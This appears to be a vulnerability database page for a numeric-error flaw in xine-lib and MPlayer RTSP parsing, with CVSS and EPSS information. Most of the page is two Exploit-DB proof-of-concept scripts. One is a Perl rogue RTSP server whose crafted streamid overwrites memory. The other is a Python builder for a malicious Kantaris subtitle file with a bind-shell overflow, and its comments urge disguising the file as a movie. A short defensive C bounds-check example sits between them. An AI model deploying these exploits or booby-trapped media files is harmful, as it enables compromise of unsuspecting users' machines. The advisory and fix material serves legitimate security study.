Related Weaknesses
CWE-ID | Weakness Name | Source |
CWE-189 | Category: Numeric Errors. Weaknesses in this category are related to improper calculation or conversion of numbers. | |
Metrics
Metrics | Score | Severity | CVSS Vector | Source |
V2 | 6.8 | | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 5307
Publication date : 2008-03-24 23h00 +00:00
Author : Guido Landi
EDB Verified : Yes
#!/usr/bin/perl
# Huston, mplayer got some vulns! :(
# CVE-2008-0073 also apply to mplayer and vlc with some distinctions.
#
# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box.
#
# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite
# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and
# some before it.
#
# Vulnerable code:
# sdpplin_parse_stream()
# desc->stream_id=atoi(buf);
# sdpplin_parse()
# desc->stream[stream->stream_id]=stream;
#
# Test:
# - mplayer rtsp://evilhost/evil.rm
# eax 0xa0737008 // pointer to desc->stream
# edx 0x0495badd // "streamid" value
# edi 0x089b59e8 // pointer to stream
#
# <sdpplin_parse+731>: mov DWORD PTR [eax+edx*4],edi
use warnings;
use strict;
use IO::Socket;
my $evil_num = "127467297"; # this is a 4byte offset from desc->stream
my $rtp_hello = "RTSP/1.0 200 OK\r\n".
"CSeq: 1\r\n".
"Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n".
"Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n".
"Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n".
"RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n".
"StatsMask: 3\r\n\r\n";
my $rtp_evil = "RTSP/1.0 200 OK\r\n".
"CSeq: 2\r\n".
"Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n".
"vsrc: http://0.00.00.00:31337\r\n".
"Content-base: rtsp://0.00.00.00:554/bu.rm\r\n".
"ETag: 55370-2\r\n".
"Session: 93033-2\r\n".
"Content-type: application/sdp\r\n".
"Content-length: 677\r\n\r\n".
"v=0\r\n".
"o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n".
"s=realmp3\r\n".
"i=<No author> <No copyright>\r\n".
"c=IN IP4 0.0.0.0\r\n".
"t=0 0\r\n".
"a=SdpplinVersion:1610645242\r\n".
"a=StreamCount:integer;\"1166000000\"\r\n".
"a=Title:buffer;\"dtFabH2rNoP=\"\r\n".
"a=range:npt=0-39.471000\r\n".
"m=audio 0 RTP/AVP 101\r\n". # this is referenced by "stream"
"b=AS:128\r\n".
"a=control:streamid=$evil_num\r\n".
"a=range:npt=0-39.471000\r\n".
"a=length:npt=39.471000\r\n".
"a=rtpmap:101 X-MP3-draft-00/1000\r\n".
"a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n".
"a=StartTime:integer;0\r\n".
"a=AvgBitRate:integer;128000\r\n".
"a=SampleRate:integer;44100\r\n".
"a=AvgPacketSize:integer;417\r\n".
"a=Preroll:integer;1000\r\n".
"a=NumChannels:integer;2\r\n".
"a=MaxPacketSize:integer;1024\r\n".
"a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n";
my @resps = ( $rtp_hello,
$rtp_evil,
"RTSP/1.0 200 OK\r\n".
"CSeq: 3\r\n".
"Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n".
"Session: 93033-2\n\r".
"Reconnect: true\n\r".
"RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r".
"RDTFeatureLevel: 2\r\n".
"Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n",
"RTSP/1.0 200 OK\r\n".
"CSeq: 4\r\n".
"Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n".
"Session: 93033-2\r\n\r\n",
"RTSP/1.0 200 OK\r\n".
"CSeq: 5\r\n".
"Date: Sat, 22 Mar 2008 15:11:06 GMT".
"RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n",
);
my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1);
while(my $csock = $sock->accept)
{
    foreach my $resp(@resps)
    {
        my $buf = read_from_sock($csock);
        print $csock $resp;
    }
}
sub read_from_sock()
{
    my ($sock) = @_;
    my $buffer = "";
    while(<$sock>)
    {
        return $buffer if /^\r\n$/;
        $buffer .= $_;
    }
    return $buffer;
}
# milw0rm.com [2008-03-25]
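
The comments in the exploit above attribute the flaw to an `atoi()` result being used directly as an index in `desc->stream[stream->stream_id]=stream`. The following C example is added here and is not xine-lib's or MPlayer's own code or fix; `stream_t`, `desc_t`, `parse_stream_id` and `store_stream` are hypothetical names and layouts. It shows the validation whose absence those comments describe: strict parsing of the `streamid` value, then a bounds check against the array size before the store.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-ins for the structures named in the exploit comments. */
typedef struct { int stream_id; } stream_t;
typedef struct { int stream_count; stream_t **stream; } desc_t;

/* Strictly parse the text after "streamid=": decimal digits only, must fit
 * in an int. Returns 0 and sets *out on success, -1 on malformed input. */
int parse_stream_id(const char *buf, int *out)
{
    char *end;
    long v;
    if (buf == NULL || *buf < '0' || *buf > '9') return -1;
    errno = 0;
    v = strtol(buf, &end, 10);
    if (errno == ERANGE || v > INT_MAX) return -1;
    if (*end != '\0' && *end != '\r' && *end != '\n') return -1;
    *out = (int)v;
    return 0;
}

/* Store the stream only when its id indexes inside the allocated array.
 * Returns 0 on success, -1 when the id is rejected (nothing is written). */
int store_stream(desc_t *desc, stream_t *stream, const char *id_text)
{
    if (desc == NULL || desc->stream == NULL || stream == NULL) return -1;
    if (parse_stream_id(id_text, &stream->stream_id) != 0) return -1;
    if (stream->stream_id < 0 || stream->stream_id >= desc->stream_count)
        return -1;
    desc->stream[stream->stream_id] = stream;
    return 0;
}

int main(void)
{
    /* Constructed input: a one-slot table and the id from the page's PoC. */
    stream_t *slots[1] = { NULL };
    desc_t desc = { 1, slots };
    stream_t s = { 0 };
    printf("id 0         -> %d\n", store_stream(&desc, &s, "0\r\n"));
    printf("id 127467297 -> %d\n", store_stream(&desc, &s, "127467297\r\n"));
    return 0;
}
```

The same check applies to any SDP attribute that later becomes an index or an allocation size, such as the `StreamCount` value in the response above.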
Exploit Database EDB-ID : 5498
Publication date : 2008-04-24 22h00 +00:00
Author : j0rgan
EDB Verified : Yes
#!/usr/bin/python
#
# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
#
# The following exploit will make a film.ssa file,
# just rename the file with the name of your movie, and use your imagination
# to pwn! :)
# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
#
# BIG thanks to muts <muts[at]offensive-security[dot]com> for helping
# and discovering a very interesting thing that we will publish soon
#
# I piss on your Business Networks course Igor Radusinovic! Go to hell!
#
# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu
import os
jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
sc = ""  # encoded payload bytes omitted
bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc
fileHandle = open ( 'film.ssa', 'w' )
fileHandle.write ( '[Script Info]\n')
fileHandle.write ( 'ScriptType: v4.00\n')
fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
fileHandle.write ( 'Collisions: Normal\n\n')
fileHandle.write ( '[V4 Styles]\n\n')
fileHandle.write ( '[Events]\n')
fileHandle.write ( 'Dialogue: '+ bafer)
fileHandle.close()
# milw0rm.com [2008-04-25]
Products Mentioned
Configuration 0
Redhat >> Fedora >> Version 8
Xine >> Xine-lib >> Version 1.1.10.1
References